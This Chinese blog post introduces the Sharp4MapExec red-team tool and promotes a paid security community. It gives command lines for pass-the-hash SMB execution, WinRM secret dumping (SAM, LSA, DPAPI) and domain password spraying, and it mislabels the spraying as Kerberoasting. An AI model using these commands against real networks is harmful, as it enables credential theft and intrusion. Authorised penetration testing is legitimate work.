.NET | 红队渗透利器: Sharp4MapExec

最新推荐文章于 2025-05-04 00:00:00 发布
最新推荐文章于 2025-05-04 00:00:00 发布
阅读量799 收藏 24
点赞数 19
CC 4.0 BY-SA版权
文章标签: .net 安全 矩阵 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ahhacker86/article/details/139416817

01阅读须知

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面

02工具介绍

Sharp4MapExec是一款基于.NET开发的高级渗透测试工具,整合了多种攻击向量,如SMB、WinRM及Kerberos域认证攻击,实战中常用于内网横向移动阶段。

图片

03工具用法

1. SMB

SMB模块允许用户利用NTLM或Kerberos认证对目标系统执行操作,包括枚举共享资源、执行系统命令等方面。基本用法如下所示。

NTLM认证:
SharpMapExec.exe ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGET
Kerberos认证:
SharpMapExec.exe kerberos smb /user:USER /password:PASSWORD /domain:DOMAIN /dc:DC /computername:TARGET

另外还可以通过扩展模块应用实现NTLM哈希认证枚举目标计算机上的共享资源,具体命令如下所示。

SharpMapExec.exe ntlm smb /user:Administrator /ntlm:AAD3B435B51404EEAADC3B435B51404EEAADC... /domain:CORP /computername:192.168.1.100 /m:shares

2. WinRM

WinRM(Windows Remote Management)模块支持远程执行命令、管理任务,特别适用于Windows环境下的后渗透操作。基本用法如下所示。此命令通过NTLM认证连接WinRM服务,并执行“whoami”命令检查当前用户权限

SharpMapExec.exe ntlm winrm /user:USER /password:PASSWORD /domain:DOMAIN /computername:TARGET /m:exec /a:whoam

还可以进一步利用Kerberos票据枚举并解析目标机器上的SAM、LSA及DPAPI密钥。命令如下所示。

SharpMapExec.exe kerberos winrm /user:Administrator /ticket:admin_ticket.kirbi /domain:CORP /computername:192.168.1.20 /m:secret

3. 域环境

Sharp4MapExec还支持针对域环境的高级攻击,如Kerberoasting、TGT委托等,比如如下运行命令通过指定的用户列表和密码字典对域进行Kerberoasting攻击,寻找可破解的服务账户哈希。

SharpMapExec.exe kerbspray /users:USERS.TXT /passwords:PASSWORDS.TXT /domain:CORP /dc:DC1.corp.example.com

综上所述,Sharp4MapExec凭借其多样化的攻击向量在内网渗透中具备重要的发挥场景,工具已经打包在星球,感兴趣的朋友可以加入自取。

04推荐阅读

从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!

图片

图片

图片

图片

图片

图片

05欢迎加入.NET安全知识库

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。

 目前星球门票¥199,后期价格随着内容和质量的不断沉淀会适当提高,星球即将涨价,2024.06月份起 ¥239,因此越早加入越好! 

    目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。

图片

图片

星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。

图片

    我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。

图片

我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。

图片

图片

 

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1208
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Math.Net学习(一)矩阵&向量
weixin_30871701的博客
12-22 1652
矩阵和向量 Math.Net Numberics程序集中包含了矩阵和向量的丰富类型。他们都支持单精度和双精度类型。像在dotnet中所有的数据类型一样,他们都是基于0索引的,例如,左上位置的索引值是(0,0),在矩阵中第一个索引值指的是行,第二个索引值指的是列,空矩阵和向量不支持,例如,每个维数的长度至少是一。 存储布局 1.向量 密集向量使用一个与向量相同长度数组。 稀疏向量...
【原创】开源Math.NET基础数学类库使用(16)C#计算矩阵
alad64007的博客
05-04 436
本博客所有文章分类的总目录:【总目录】本博客博文总目录-实时更新 开源Math.NET基础数学类库使用总目录:【目录】开源Math.NET基础数学类库使用总目录   上个月对Math.NET的基本使用进行了介绍,主要内容有矩阵,向量的相关操作,解析数据格式,数值积分,数据统计,相关函数,求解线性方程组以及随机数发生器的相关内容。这个月接着深入发掘M...
渗透神器 NetExec (nxc) 使用指南
最新发布
vortex5的博客
05-04 1130
NetExec(nxc)是一个强大的网络服务利用工具,旨在自动化评估大型网络的安全性。它是 CrackMapExec 的继任者,支持多种协议(SMB、LDAP、WinRM、MSSQL、RDP、FTP 等),并通过模块化设计提供枚举、凭据测试、漏洞扫描和后渗透功能。NetExec 凭借其多协议支持、模块化设计和高效执行能力,成为域渗透中的利器。通过熟练掌握其命令、模块和高级功能,你可以在信息收集、凭据提取和漏洞利用中游刃有余。
.NET数学库NMath使用教程——矩阵
yuyuyuyo的博客
07-01 638
NMath是一个适用于所有.NET语言,如C#、Visual Basic、F#和.NET的数学库,它包含了.NET平台上的面向对象数字计算的基础类。我们将以连载的形式向大家介绍NMath的实用教程。本节展示在NMatht数学库中的矩阵类函数。 最新版...
404到默认页面,通过.cshtml拿到webshell
weixin_34261415的博客
09-19 1425
本文讲的是从404到默认页面,通过.cshtml拿到webshell, 开始 .cshtml是什么? 可能一些人知道,但是我确定很大一部分人是不知道的。.cshtml是MVC3之后新增的视图文件,跟原先的aspx很相似。 404错误 做一次外部安全评估之前,我一般从被动信息收集开始,收集过程中使用多个工具,如Sublister,DNS查询,Google...
C#中利用Math.NET进行矩阵运算,极大提高数组运算的性能
weixin_42974146的博客
05-29 4612
本人写了一个airPLS的算法,用到大量的数组运算,由于以前是用for循环来解决数组计算,如果你的数组很大,那么整个算法跑下来非常消耗时间。解决办法是利用MathNet.Numerics,他的安装方法见博客,或者可以直接下载MathNet.Numerics.dll(自己百度)。 使用前先添加命名空间 using MathNet.Numerics.LinearAlgebra.Double; using MathNet.Numerics.LinearAlgebra.Generic; 一、常用的矩阵初始化 v
干货|红队渗透工具集(一)
weixin_46211944的博客
07-14 1209
功能包括域名ip历史解析、nmap常见端口爆破、子域名信息收集、旁站信息收集、whois信息收集、网站架构分析、cms解析、备案号信息收集、CDN信息解析、是否存在waf检测、后台寻找以及生成检测结果html报告表等。项目地址https//github.com/xzajyjs/ThunderSearch。项目地址https//github.com/r0eXpeR/redteam-tools。项目地址https//github.com/0x90/rdp-arsenal。支持查询用户个人信息。...
红队渗透打点工具-FindUpload
03-07
红队渗透打点工具-FindUpload】 在网络安全领域,红队渗透测试是模拟黑客攻击行为,以评估组织防御能力的一种重要方法。FindUpload作为一款红队打点工具,其核心功能在于帮助渗透测试专家有效地查找和定位网络...
红队渗透攻击技术手册:免杀技巧与内网穿透
12-06
内容概要:本文档《红队攻击指南.pdf》是一份详细介绍了红队渗透测试过程中所需的各种技术和工具的手册。主要内容包括工具免杀篇、流量加密篇、隧道应用篇和网络钓鱼篇。每个章节详细介绍了具体的免杀方法、流量...
红队装备库:CobaltStrikeAggressor脚本开发.pdf
05-03
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿...
webshell,包含asp,php,aspx,jsp
08-15
asp php aspx jsp webshell,Webshell马全套
05-红队测试之邮箱打点.pdf
09-20
05-红队测试之邮箱打点.pdf
.NET 中文件嵌套,例如:cshtml文件下面嵌套css和js【机器翻译】
weixin_30344795的博客
07-25 817
越来越多的我发现自己在我的一些较大的Web项目中丢失了文件。有很多内容要处理 - HTML视图,几个派生CSS页面,页面级CSS,脚本库,应用程序范围的脚本和页面特定的脚本文件等等。幸运的是,我使用Resharper和Ctrl-T转到任何自动完成你到任何文件,快速键入,成员。令人敬畏的除了当我忘记 - 或者当我不太确定我正在寻找的名字。项目导航仍然很重要。 有时在一个项目工作时,我似...
C#使用Math.Net库进行矩阵运算
weixin_43956732的博客
05-02 3258
一、基础知识 1、 Math.net是什么   Math.net计算库是专为.NET开发的开源科学计算库。包含了大部分矩阵运算、线性运算等功能。效率高,且可以在C#中直接使用。简单的矩阵运算,其效率可以达到C#代码的10倍以上。 开源地址:http://mathnetnumerics.codeplex.com Math.NET Numerics是核心功能是数值计算。主...
html文件里写typescript,关于.net.cshtml Razor文件中的TypeScript
weixin_39975868的博客
06-25 408
我正在使用ASP.NET-MVC框架开始一个新项目。我想在这个项目中使用TypeScript代替JavaScript。 Visual Studio可以轻松支持TypeScript,但似乎与(.cshtml)剃刀文件不完全兼容。我可以在.ts文件中创建我的类,并在.cshtml文件中调用这些类,问题是当我将参数传递给.cshtml文件中的对象时,TypeSafety被忽略,并且该函数像类型从未定义。...
ASP.NET MVC 学习(一)--MVC的cshtml的介绍
nanbaifeiliao的专栏
10-24 6521
cshtml 是 MVC3 之后新增的视图文件,跟原先的 aspx 很相似。 区别主要在于二者的解释引擎不同。aspx 采用的是 WebForm Engine,而 cshtml 则是 Razor Rendering Engine。引擎的变化直接导致语法发生变化。aspx 中我们经常使用 <% test; %>这种,在 cshtml 中则改为 @{ test; } 这种更为简洁的写法。...
.net mvc——前端html(cshtml)页面利用ajax向后端controller传值的常用方式
知北行的博客
02-11 5498
这里前端html页面使用ajax向controller传递的主要是form表单的内容,且前端使用了layui框架。后端controller接收值可以有两种方法 1.前端cshtml代码(layui模板自带的登录界面,使用时记得添加相关的引用和依赖,这里已经封装在BundleConfig.cs中) @{ ViewBag.Title = "Login"; } <!DOCTYPE ...
.Net MVC 中_Layout.cshtml页面新布局(转载)
qq_33380252的博客
11-09 5164
作为一个刚刚开始学习Mvc的新人来说,从之前的winform页面到现在MVC的转变,感觉这是华丽丽的转身啊,再没有拖拽控件,转而是一种规范的格式,用Model-View-Controller三者把一个系统的构成完美呈现,你可以选择用其自带的模版来完成系统的开发,很强大,很方便。   但是对于现在越来越需要关注度的时代来说,漂亮的页面必不可少,你当然可以自己用html来完成页面的设计,但是,MVC...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

dot.Net安全矩阵

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值